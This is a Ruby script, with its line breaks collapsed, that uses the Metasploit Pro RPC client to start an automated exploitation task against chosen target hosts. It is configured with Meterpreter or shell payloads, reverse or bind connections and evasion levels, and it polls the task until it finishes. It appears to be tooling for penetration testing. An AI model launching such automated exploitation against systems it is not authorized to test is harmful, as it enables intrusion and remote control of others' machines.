#!/usr/bin/env ruby require 'rubygems' require 'optparse' require 'msfrpc-client' require 'rex/ui' def usage(ropts) $stderr.puts ropts if @rpc and @rpc.token wspaces = @rpc.call("pro.workspaces") rescue {} if wspaces.keys.length > 0 $stderr.puts "Active Projects:" wspaces.each_pair do |k,v| $stderr.puts "\t#{k}" end end end $stderr.puts "" exit(1) end opts = {} opts[:blacklist] = '' opts[:whitelist_ports] = '' opts[:blacklist_ports] = '' opts[:exploit_timeout] = 5 opts[:limit_sessions] = true opts[:ignore_fragile_devices] = true opts[:filter_by_os] = true opts[:only_match] = false opts[:match_vulns] = true opts[:match_ports] = true opts[:payload_method] = "auto" opts[:payload_type] = "meterpreter" opts[:payload_ports] = "4000-5000" opts[:evasion_level_tcp] = 0 opts[:evasion_level_app] = 0 opts[:module_filter] = '' # Parse script-specific options parser = Msf::RPC::Client.option_parser(opts) parser.separator('Exploit Specific Options:') parser.on("--project PROJECT") do |x| opts[:project] = x end parser.on("--targets TARGETS") do |x| opts[:targets] = x end parser.on("--speed SPEED") do |x| opts[:speed] = x end parser.on("--minimum-rank RANK") do |x| opts[:rank] = x end parser.on("--blacklist BLACKLIST (optional)") do |x| opts[:blacklist] = x end parser.on("--whitelist-ports PORTS (optional)") do |x| opts[:whitelist_ports] = x end parser.on("--blacklist-ports PORTS (optional)") do |x| opts[:blacklist_ports] = x end parser.on("--exploit-timeout TIMEOUT (optional)") do |x| opts[:exploit_timeout] = x end parser.on("--limit-sessions (optional)") do |x| opts[:limit_sessions] = (x =~ /^(y|t|1)/i ? true : false ) end parser.on("--ignore-fragile-devices (optional)") do |x| opts[:ignore_fragile_devices] = (x =~ /^(y|t|1)/i ? true : false ) end parser.on("--filter-by-os (optional)") do |x| opts[:filter_by_os] = (x =~ /^(y|t|1)/i ? true : false ) end parser.on("--dry-run (optional)") do |x| opts[:only_match] = (x =~ /^(y|t|1)/i ? true : false ) end parser.on("--match-vulns (optional)") do |x| opts[:match_vulns] = (x =~ /^(y|t|1)/i ? true : false ) end parser.on("--match-ports (optional)") do |x| opts[:match_ports] = (x =~ /^(y|t|1)/i ? true : false ) end parser.on("--payload-method AUTO|REVERSE|BIND (optional)") do |x| opts[:payload_method] = x end parser.on("--payload-type METERPRETER|SHELL (optional)") do |x| opts[:payload_type] = x end parser.on("--payload-ports PORTS (optional)") do |x| opts[:payload_ports] = x end parser.on("--evasion-level-tcp LEVEL (optional)") do |x| opts[:evasion_level_tcp] = x end parser.on("--evasion-level-app LEVEL (optional)") do |x| opts[:evasion_level_app] = x end parser.on("--module-filter FILTER (optional)") do |x| opts[:module_filter] = x end parser.on("--help") do $stderr.puts parser exit(1) end parser.separator('') parser.parse!(ARGV) @rpc = Msf::RPC::Client.new(opts) if not @rpc.token $stderr.puts "Error: Invalid RPC server options specified" $stderr.puts parser exit(1) end # Store the user's settings project = opts[:project] || usage(parser) targets = opts[:targets] || usage(parser) rank = opts[:rank] || usage(parser) speed = opts[:speed] || usage(parser) blacklist = opts[:blacklist] whitelist_ports = opts[:whitelist_ports] blacklist_ports = opts[:blacklist_ports] exploit_timeout = opts[:exploit_timeout] limit_sessions = opts[:limit_sessions] ignore_fragile_devices = opts[:ignore_fragile_devices] filter_by_os = opts[:filter_by_os] only_match = opts[:only_match] match_vulns = opts[:match_vulns] match_ports = opts[:match_ports] payload_method = opts[:payload_method] payload_type = opts[:payload_type] payload_ports = opts[:payload_ports] evasion_level_tcp = opts[:evasion_level_tcp] evasion_level_app = opts[:evasion_level_app] module_filter = opts[:module_filter] #=== # Get the default user user = @rpc.call("pro.default_admin_user")['username'] # Create the task object with all options task = @rpc.call("pro.start_exploit", { 'workspace' => project, 'username' => user, 'DS_WHITELIST_HOSTS' => targets, 'DS_BLACKLIST_HOSTS' => blacklist, 'DS_WHITELIST_PORTS' => whitelist_ports, 'DS_BLACKLIST_PORTS' => blacklist_ports, 'DS_MinimumRank' => rank, 'DS_EXPLOIT_SPEED' => speed, 'DS_EXPLOIT_TIMEOUT' => exploit_timeout, 'DS_LimitSessions' => limit_sessions, 'DS_IgnoreFragileDevices' => ignore_fragile_devices, 'DS_FilterByOS' => filter_by_os, 'DS_OnlyMatch' => only_match, 'DS_MATCH_VULNS' => match_vulns, 'DS_MATCH_PORTS' => match_ports, 'DS_PAYLOAD_METHOD' => payload_method, 'DS_PAYLOAD_TYPE' => payload_type, 'DS_PAYLOAD_PORTS' => payload_ports, 'DS_EVASION_LEVEL_TCP' => evasion_level_tcp, 'DS_EVASION_LEVEL_APP' => evasion_level_app, 'DS_ModuleFilter' => module_filter }) puts "DEBUG: Running task with #{task.inspect}" if not task['task_id'] $stderr.puts "[-] Error starting the task: #{task.inspect}" exit(0) end puts "[*] Creating Task ID #{task['task_id']}..." while true select(nil, nil, nil, 0.50) stat = @rpc.call("pro.task_status", task['task_id']) if stat['status'] == 'invalid' $stderr.puts "[-] Error checking task status" exit(0) end info = stat[ task['task_id'] ] if not info $stderr.puts "[-] Error finding the task" exit(0) end if info['status'] == "error" $stderr.puts "[-] Error generating report: #{info['error']}" exit(0) end break if info['progress'] == 100 end $stdout.puts "[+] Task Complete!"